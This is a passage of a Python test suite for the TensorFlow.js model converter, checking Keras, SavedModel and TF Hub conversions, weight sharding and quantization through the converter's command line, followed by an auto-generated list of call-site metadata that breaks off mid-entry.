self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. 
weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDense1/kernel', 'MergedDense1/bias', 'MergedDense2/kernel' ])) self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDense1/bias'], [4]) self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32') def testLoadKerasModel(self): # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision. with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. model1 = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model1, self._tmp_dir) model1_weight_values = model1.get_weights() with tf.Graph().as_default(), tf.compat.v1.Session(): # Load the model from saved artifacts. model2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) # Compare the loaded model with the original one. model2_weight_values = model2.get_weights() self.assertEqual(len(model1_weight_values), len(model2_weight_values)) for model1_weight_value, model2_weight_value in zip( model1_weight_values, model2_weight_values): self.assertAllClose(model1_weight_value, model2_weight_value) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*'))) def testInvalidInputFormatRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'nonsensical_format', self._tmp_dir, self._tmp_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'--input_format', tf.compat.as_bytes(stderr)) def testMissingInputPathRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'input_path', tf.compat.as_bytes(stderr)) def testKerasH5ConversionWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. 
weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there is only one weight group due to the default # non-split_weights_by_layer behavior. The model is a small one, which # does not exceed the 4-MB shard size limit. Therefore, there should # be only one weight file. self.assertEqual( 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', '--split_weights_by_layer', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there are two weight groups due to the optional flag # --split_weights_by_layer behavior. The model is a small one. None of # the layers should have weight sizes exceeding the 4-MB shard size # limit. 
self.assertEqual( 2, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionWithSignatureNameErrors(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'keras', '--signature_name', 'bar', os.path.join(self._tmp_dir, 'foo.h5'), os.path.join(self._tmp_dir, 'output') ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn( b'The --signature_name flag is applicable only to', tf.compat.as_bytes(stderr)) def testConvertTFSavedModelV1WithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFSavedModelWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'dtype': 'float32', 'shape': [], 'name': 'StatefulPartitionedCall/mul' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) weights_manifest = output_json['weightsManifest'] self.assertEqual(len(weights_manifest), len(weights)) if sys.version_info[0] < 3: self.assertItemsEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertItemsEqual(weights_manifest[0]['weights'], weights[0]['weights']) else: self.assertCountEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertCountEqual(weights_manifest[0]['weights'], weights[0]['weights']) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. 
    output_json = json.load(
        open(os.path.join(output_dir, 'model.json'), 'rt'))
    self.assertEqual(output_json['weightsManifest'], weights)

    # Check the content of the output directory.
    self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))

  def testConvertTensorflowjsArtifactsToKerasH5(self):
    # 1. Create a toy keras model and save it as an HDF5 file.
    os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
    h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model = _createKerasModel('MergedDenseForCLI', h5_path)
      model_json = model.to_json()

    # 2. Convert the HDF5 file to tensorflowjs format.
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras', h5_path,
        self._tmp_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Convert the tensorflowjs artifacts back to HDF5.
    new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
        '--output_format', 'keras',
        os.path.join(self._tmp_dir, 'model.json'), new_h5_path])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 4. Load the model back from the new HDF5 file and compare with the
    # original model.
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model_2 = keras.models.load_model(new_h5_path)
      model_2_json = model_2.to_json()
      self.assertEqual(model_json, model_2_json)

  def testLoadTensorflowjsArtifactsAsKerasModel(self):
    # 1. Create a toy keras model and save it as an HDF5 file.
    os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
    h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model = _createKerasModel('MergedDenseForCLI', h5_path)
      model_json = model.to_json()

    # 2. Convert the HDF5 file to tensorflowjs format.
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras', h5_path,
        self._tmp_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Load the tensorflowjs artifacts as a keras.Model instance.
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model_2 = tfjs.converters.load_keras_model(
          os.path.join(self._tmp_dir, 'model.json'))
      model_2_json = model_2.to_json()
      self.assertEqual(model_json, model_2_json)

  def testVersion(self):
    process = subprocess.Popen(
        ['tensorflowjs_converter', '--version'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, _ = process.communicate()
    self.assertEqual(0, process.returncode)
    self.assertIn(
        tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
        tf.compat.as_bytes(stdout))

    process = subprocess.Popen(
        ['tensorflowjs_converter', '-v'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, _ = process.communicate()
    self.assertEqual(0, process.returncode)
    self.assertIn(
        tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
        tf.compat.as_bytes(stdout))


class ConvertTfKerasSavedModelTest(tf.test.TestCase):

  def setUp(self):
    super(ConvertTfKerasSavedModelTest, self).setUp()
    self._tmp_dir = tempfile.mkdtemp()

  def tearDown(self):
    if os.path.isdir(self._tmp_dir):
      shutil.rmtree(self._tmp_dir)
    super(ConvertTfKerasSavedModelTest, self).tearDown()

  def _createSimpleSequentialModel(self):
    model = keras.Sequential()
    model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
    model.add(keras.layers.LSTM(10))
    model.add(keras.layers.Dense(1, activation='sigmoid'))
    return model

  def _createNestedSequentialModel(self):
    model = keras.Sequential()
    model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
    model.add(self._createSimpleSequentialModel())
    return model

  def _createFunctionalModelWithWeights(self):
    input1 = keras.Input(shape=[8])
    input2 = keras.Input(shape=[10])
    y = keras.layers.Concatenate()([input1, input2])
    y = keras.layers.Dense(4, activation='softmax')(y)
    model = keras.Model([input1, input2], y)
    return model

  def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then saved the model
      # as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      model_json_path = os.path.join(tfjs_output_dir, 'model.json')
      self.assertTrue(os.path.isfile(model_json_path))

      # 3. Convert the tfjs model to keras h5 format.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'keras', model_json_path, new_h5_path])
      process.communicate()
      self.assertEqual(0, process.returncode)

      self.assertTrue(os.path.isfile(new_h5_path))

      # 4. Load the model back and assert on the equality of the predict
      # results.
      model_prime = keras.models.load_model(new_h5_path)
      new_y = model_prime.predict(x)
      self.assertAllClose(y, new_y)

  def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x1 = np.random.randn(4, 8)
      x2 = np.random.randn(4, 10)

      # 1. Run the model.predict(), store the result. Then saved the model
      # as a SavedModel.
      model = self._createFunctionalModelWithWeights()
      y = model.predict([x1, x2])

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Use explicit --output_format value: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          '--output_format', 'tfjs_layers_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      model_json_path = os.path.join(tfjs_output_dir, 'model.json')
      self.assertTrue(os.path.isfile(model_json_path))

      # 3. Convert the tfjs model to keras h5 format.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'keras', model_json_path, new_h5_path])
      process.communicate()
      self.assertEqual(0, process.returncode)

      self.assertTrue(os.path.isfile(new_h5_path))

      # 4. Load the model back and assert on the equality of the predict
      # results.
      model_prime = keras.models.load_model(new_h5_path)
      new_y = model_prime.predict([x1, x2])
      self.assertAllClose(y, new_y)

  def testUsingIncorrectKerasSavedModelRaisesError(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then saved the model
      # as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Use incorrect --input_format value: keras
      process = subprocess.Popen(
          [
              'tensorflowjs_converter', '--input_format', 'keras',
              self._tmp_dir, tfjs_output_dir
          ],
          stdout=subprocess.PIPE,
          stderr=subprocess.PIPE)
      _, stderr = process.communicate()
      self.assertIn(
          b'Expected path to point to an HDF5 file, '
          b'but it points to a directory', tf.compat.as_bytes(stderr))

  def testConvertTfjsLayersModelIntoShardedWeights(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then saved the model
      # as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      weights = model.get_weights()
      total_weight_bytes = sum(np.size(w) for w in weights) * 4

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs_layers_model format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 3. Convert the tfjs_layers_model to another tfjs_layers_model,
      # with sharded weights.
      weight_shard_size_bytes = int(total_weight_bytes * 0.3)
      # Due to the shard size, there ought to be 4 shards after conversion.
      sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'tfjs_layers_model',
          '--weight_shard_size_bytes', str(weight_shard_size_bytes),
          os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 4. Check the sharded weight files and their sizes.
      weight_files = sorted(
          glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
      self.assertEqual(len(weight_files), 4)
      weight_file_sizes = [os.path.getsize(f) for f in weight_files]
      self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
      self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
      self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
      self.assertLess(weight_file_sizes[3], weight_file_sizes[0])

      # 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          os.path.join(sharded_model_dir, 'model.json'), new_h5_path
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

    with tf.Graph().as_default(), tf.compat.v1.Session():
      # 6. Load the keras model and check the predict() output is close to
      # before.
      new_model = keras.models.load_model(new_h5_path)
      new_y = new_model.predict(x)
      self.assertAllClose(new_y, y)

  def testConvertTfjsLayersModelWithQuantization(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then saved the model
      # as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      weights = model.get_weights()
      total_weight_bytes = sum(np.size(w) for w in weights) * 4

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs_layers_model format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 3. Convert the tfjs_layers_model to another tfjs_layers_model,
      # with uint16 quantization.
      weight_shard_size_bytes = int(total_weight_bytes * 0.3)
      # Due to the shard size, there ought to be 4 shards after conversion.
      sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'tfjs_layers_model',
          '--quantization_bytes', '2',
          os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 4. Check the quantized weight file and its size.
      weight_files = sorted(
          glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
      self.assertEqual(len(weight_files), 1)
      weight_file_size = os.path.getsize(weight_files[0])
      # The size of the weight file should reflect the uint16 quantization.
      self.assertEqual(weight_file_size, total_weight_bytes // 2)

  def testConvertTfjsLayersModelToTfjsGraphModel(self):
    x = np.random.randn(8, 10)

    # 1. Create a model for testing.
    model = keras.Sequential()
    model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
    model.add(keras.layers.Dense(1, activation='sigmoid'))
    h5_path = os.path.join(self._tmp_dir, 'model.h5')
    model.save(h5_path)

    # 2. Convert the keras saved model to tfjs_layers_model format.
    layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
    # Implicit value of --output_format: tfjs_layers_model
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras',
        h5_path, layers_model_output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Convert the tfjs_layers_model to another tfjs_graph_model.
    graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
        '--output_format', 'tfjs_graph_model',
        os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 4. Check the model.json and weight file and its size.
    self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
    weight_files = sorted(
        glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
    self.assertEqual(len(weight_files), 1)


if __name__ == '__main__':
  tf.test.main()
[((57, 17, 57, 42), 'tensorflow.keras.layers.Input', 'keras.layers.Input', ({(57, 36, 57, 41): '(3,)'}, {}), '((3,))', False, 'from tensorflow import keras\n'), ((69, 10, 69, 69), 'tensorflow.keras.models.Model', 'keras.models.Model', (), '', False, 'from tensorflow import keras\n'), ((81, 10, 81, 20), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((118, 15, 118, 50), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((119, 9, 119, 33), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ({}, {}), '()', False, 'from tensorflow.python.training.tracking import tracking\n'), ((120, 12, 120, 34), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', ({(120, 31, 120, 33): '3.0'}, {}), '(3.0)', False, 'from tensorflow.python.ops import variables\n'), ((121, 12, 121, 34), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', ({(121, 31, 121, 33): '2.0'}, {}), '(2.0)', False, 'from tensorflow.python.ops import variables\n'), ((122, 11, 122, 65), 'tensorflow.python.eager.def_function.function', 'def_function.function', ({(122, 33, 122, 64): 'lambda x: root.v1 * root.v2 * x'}, {}), '(lambda x: root.v1 * root.v2 * x)', False, 'from tensorflow.python.eager import def_function\n'), ((125, 2, 125, 32), 'tensorflow.python.saved_model.save.save', 'save', ({(125, 7, 125, 11): 'root', (125, 13, 125, 22): 'save_path', (125, 24, 125, 31): 'to_save'}, {}), '(root, save_path, to_save)', False, 'from tensorflow.python.saved_model.save import save\n'), ((139, 10, 139, 20), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((873, 2, 873, 16), 'tensorflow.test.main', 'tf.test.main', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((58, 11, 63, 35), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((64, 11, 68, 35), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((136, 8, 136, 31), 'tensorflow.Variable', 'tf.Variable', ({(136, 20, 136, 30): '[2.0, 4.0]'}, {}), '([2.0, 4.0])', True, 'import tensorflow as tf\n'), ((137, 8, 137, 50), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', (), '', True, 'import tensorflow as tf\n'), ((138, 4, 138, 44), 'tensorflow_hub.add_signature', 'hub.add_signature', (), '', True, 'import tensorflow_hub as hub\n'), ((141, 11, 141, 51), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', ({(141, 34, 141, 50): 'double_module_fn'}, {}), '(double_module_fn)', True, 'import tensorflow_hub as hub\n'), ((142, 8, 142, 24), 'tensorflow_hub.Module', 'hub.Module', ({(142, 19, 142, 23): 'spec'}, {}), '(spec)', True, 'import tensorflow_hub as hub\n'), ((144, 7, 144, 40), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', (), '', True, 'import tensorflow as tf\n'), ((153, 24, 153, 42), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((154, 29, 154, 78), 'os.path.join', 'os.path.join', ({(154, 42, 154, 59): 'cls.class_tmp_dir', (154, 61, 154, 77): '"""tf_saved_model"""'}, {}), "(cls.class_tmp_dir, 'tf_saved_model')", False, 'import os\n'), ((155, 32, 156, 55), 'os.path.join', 'os.path.join', ({(156, 16, 156, 33): 'cls.class_tmp_dir', (156, 35, 156, 54): '"""tf_saved_model_v1"""'}, {}), "(cls.class_tmp_dir, 'tf_saved_model_v1')", False, 'import os\n'), ((159, 28, 159, 76), 'os.path.join', 
'os.path.join', ({(159, 41, 159, 58): 'cls.class_tmp_dir', (159, 60, 159, 75): '"""tf_hub_module"""'}, {}), "(cls.class_tmp_dir, 'tf_hub_module')", False, 'import os\n'), ((164, 4, 164, 36), 'shutil.rmtree', 'shutil.rmtree', ({(164, 18, 164, 35): 'cls.class_tmp_dir'}, {}), '(cls.class_tmp_dir)', False, 'import shutil\n'), ((174, 20, 174, 38), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((178, 7, 178, 35), 'os.path.isdir', 'os.path.isdir', ({(178, 21, 178, 34): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((249, 14, 255, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((261, 14, 266, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((396, 17, 396, 44), 'os.path.join', 'os.path.join', ({(396, 30, 396, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((397, 14, 401, 6), 'subprocess.Popen', 'subprocess.Popen', ({(397, 31, 401, 5): "['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\n output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_v1_dir, output_dir])", False, 'import subprocess\n'), ((419, 17, 419, 44), 'os.path.join', 'os.path.join', ({(419, 30, 419, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((420, 14, 423, 6), 'subprocess.Popen', 'subprocess.Popen', ({(420, 31, 423, 5): "['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])", False, 'import subprocess\n'), ((444, 17, 444, 44), 'os.path.join', 'os.path.join', ({(444, 30, 444, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((445, 14, 449, 6), 'subprocess.Popen', 'subprocess.Popen', ({(445, 31, 449, 5): "['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_dir, output_dir])", False, 'import subprocess\n'), ((482, 17, 482, 44), 'os.path.join', 'os.path.join', ({(482, 30, 482, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((483, 14, 486, 6), 'subprocess.Popen', 'subprocess.Popen', ({(483, 31, 486, 5): "['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])", False, 'import subprocess\n'), ((509, 14, 509, 65), 'os.path.join', 'os.path.join', ({(509, 27, 509, 40): 'self._tmp_dir', (509, 42, 509, 52): '"""keras_h5"""', (509, 54, 509, 64): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((515, 14, 518, 6), 'subprocess.Popen', 'subprocess.Popen', ({(515, 31, 518, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((523, 18, 523, 59), 'os.path.join', 'os.path.join', ({(523, 31, 523, 44): 'self._tmp_dir', (523, 46, 523, 58): '"""model_2.h5"""'}, {}), "(self._tmp_dir, 'model_2.h5')", False, 'import os\n'), ((541, 14, 541, 65), 'os.path.join', 
